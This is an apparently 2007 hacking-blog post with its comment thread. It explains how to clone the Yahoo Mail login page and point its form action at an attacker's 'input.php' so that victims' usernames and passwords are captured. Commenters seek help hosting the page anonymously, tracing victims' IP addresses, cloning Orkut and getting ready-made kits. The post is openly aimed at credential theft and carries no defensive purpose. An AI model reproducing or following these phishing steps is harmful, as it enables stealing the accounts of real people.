Many people asked me how to create f@ke login pages,here is the method to create them (I’m taking yahoo mail as an example)
First save the yahoo login page, then copy the source code of the page directly from internet on to note pad or you favorite text editor (if you are using internet explorer right click on the login page and select view source for mozilla press ctr+u) .Now search for the term “action”, you should find a line like this
<form method=”post”action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”>
When you enter your login information in the original login page, it is submitted to this url https://login.yahoo.com/config/login
change https://login.yahoo.com/config/login to “input.php” . When you change the action to input.php, user name and password are submitted to this file when ever user enters his login information in our f@ke login page.
I will tell you how to create this input.php file, what is its function and how the passwords are saved in my next post

















April 1st, 2007 at 1:31 am
waiting for yr next post champ………….
this is also excelnt lk yr previous once…
April 1st, 2007 at 1:34 am
Thanx for the support dude
April 1st, 2007 at 4:11 am
cool stuff….when r u gonna tell us how to create the input.php file…i’m all ears
April 1st, 2007 at 9:29 am
i could not get this line in ur creating fake login pages topic..could u pls explain this to me/ “Now search for the name of each file name in the source we copied and replace the file source url (text after src=” )with “files/filename”.”
April 1st, 2007 at 9:51 am
whenever you save a web page all the images and files related to the page will be saved in a folder with name related to the page you saved. For example if you save a page with name “huntme” in mozilla all the files will be stored in a folder named “huntme_files”. Search for the name of each file in the source code of the page ( For example if you find a image named home.jpg in the folder “huntme_files” search for “home.jpg” in the source of the page ) and replace its url “files/filename”. In our example you should replace it with “files/home.jpg” (if you copied all the files to the directory named “files”. Hope i cleared your doubt , if you still have problem fell free to post them here
GoodDay
-huntme
April 1st, 2007 at 1:43 pm
Copy all the images and files from the page you saved in the begining to a new directory named “files”. ?????? i cant get that men ? sorry to say but ur matter is a bit complicated can u plzz xplain it in a simpler manner …. i cant get that directory were n which directory are v supposed to save that images
April 1st, 2007 at 2:53 pm
hey gr8 post.w8 for ur next post.I am able to make a login page but pics are not comming plz help.
April 1st, 2007 at 4:48 pm
@sexestranger n pallav
It’s not so complicated
I think you are having problem with my bad english
I edited post so please read it again.Hope i made it clear
April 1st, 2007 at 5:49 pm
man using it in the same way.but pics are not cooming.Even in the 1 i downloaded frm ur site pics are not comming.Plz help
April 1st, 2007 at 5:53 pm
plz post how to make input.php as soon as possible.I cant w8 man.
April 1st, 2007 at 6:05 pm
There is no problem with the zipped file I uploaded in my site , I checked it again.Don’t open the login page directly from the zipped folder. First copy the fake folder to your computer and then open the login page. Please check the fake page you created again if you still have problem mail me the page you created. I tell you how to make input.php with in 1 or 2 days in the mean time try to learn php that will be helpful in creating input.php file and making dynamic websites.
You can learn php here
http://w3schools.com/php/default.asp
Note: You need not copy the files to any other directory from the zipped file downloaded from my blog.
April 2nd, 2007 at 1:26 am
Well, I made the page as it was.
and omg, it looks exactly like the real one!
I wanted to ask that, If I cut this ‘Fake login page’ and paste it somewhere in a location which will not give any clue of my PC, then will the login page still work?
btw, I’m waiting eagerly for that input.php thing
April 2nd, 2007 at 11:19 am
dude,
you are beyond god-like .
your next post please…………….
April 2nd, 2007 at 2:30 pm
listen men i didn’t mean to hurt u i had no such intentions just wanted it in a simpler manner bcoz i cant understand it thats ity sorry if it did hurt u
April 2nd, 2007 at 4:55 pm
hey i’ve created the fake login page and signed for an account with ifastnet..how do i upload the files and how do i create the input.php file???
April 4th, 2007 at 3:05 am
Hi ! The way u have shown is great…….it is working for all pages accept orkut…….I don’t know whether you have checked it or not…….The orkut login page is having two different sources…….One is for the main page…….and one is for the service login page…….With firefox i am not able to see both of the sources…….but with internet explorer you can…….just u have to click two times…….once in the right side of the page and once in the left side of the page…….even if u copy the view source in the note pad and then change it into .htm…….the login form will not appear…….even in the source I’m not finding where to press the input.php…….
Can you do me a favor…….please tell me how can i make the fake page of the orkut login page…….
April 5th, 2007 at 7:54 am
hey i hav replaced the https://login.yahoo.com/config/login to “input.php but after that m not getting Now search for the name of each file name in the source we copied and replace the file source url (text after src=” )with “files/filename”.
where i will get the src i hav searched i hav got several src .we to search src in the same source code which we got frm yahoomail.com. pls explain me!!
April 5th, 2007 at 10:51 pm
whenever you save a web page all the images and files related to the page will be saved in a folder with name related to the page you saved. For example if you save a page with name “huntme” in mozilla all the files will be stored in a folder named “huntme_files”. Search for the name of each file in the source code of the page ( For example if you find a image named home.jpg in the folder “huntme_files” search for “home.jpg” in the source of the page ) and replace its url “files/filename”. In our example you should replace it with “files/home.jpg” (if you copied all the files to the directory named “files”. Hope i cleared your doubt , if you still have problem fell free to post them here
April 6th, 2007 at 1:08 am
dude…u rockkkkkkkkkkkkkk……….thanxxxa ton man..!!! ur awesome……
ur posts r simply gr888…… really dude thanxx alottaa..
can u tell me ways to recover my yahoomail password which i frgot…??
if possbl plz help…waiting 4 ur ur reply n next post…
April 11th, 2007 at 12:09 am
thanx
April 12th, 2007 at 9:45 am
Hi .. gr8 blog !
can u tell me how to know the ip address of the user who posted his password and id on my fake page ? please tell me ! thanx ..
April 13th, 2007 at 5:19 pm
@abhinav
sorry dude i have no idea about how to recover a lost yahoo passwd
thanx 4ur comments
@prat
I can tell you but I’m little busy with exams, you should wait for the post
-thanq
July 6th, 2007 at 6:20 pm
Why u ppl westing time in making fake loggin and alll,,,u can make fake logging directly by the software called web copier,,,,,it will copy ur target site,,,than just change like to input.php…………….
January 20th, 2008 at 12:53 pm
waiting fr d next post
January 20th, 2008 at 12:56 pm
There is no problem with the zipped file I uploaded in my site , I checked it again.Don’t open the login page directly from the zipped folder. First copy the fake folder to your computer and …..
hey in these lines of urs..m not gting frm where to download the zipped file
January 24th, 2008 at 6:17 am
plz send in my id how to create “input.php” and save passwords in this file and how to see this fle
January 24th, 2008 at 10:08 am
hi trishna
Link to the zipped file and links to other files realted to fake login pages are not active. I removed all those links as many people were misusing them
February 1st, 2008 at 7:02 am
it seems complicated …
so can u please mail me all the steps at
sunny_gcm@yahoo.com…
including how to make input.php
February 10th, 2008 at 6:26 pm
i have recover my orkut password
April 18th, 2008 at 10:18 pm
If what has been explained in this article is too complicated for anyone of you noobs, then you’re in the wrong business, because what is explained here is child’s play. Learn some languages, kiddies.
April 18th, 2008 at 11:29 pm
@nietzsche
This is a child’s play and a very old trick but there are still many people who fall into this trap.
July 23rd, 2008 at 4:43 am
how does it work
August 2nd, 2008 at 8:14 am
It’s been a month now and still no input.php posted. I have a fake login before but just copied it from a friend. It uses mailto.cgi script. I just hope that you can create a mailto.cgi script coz my old one do really work.
August 5th, 2008 at 1:15 pm
Hi there i need fake login pages so anyone can contact me at kool_at_kold@hotmail.com…thanx!!
August 10th, 2008 (4 weeks ago) at 10:30 am
excellent tricks man.
can u plz send me more fake login page for orkut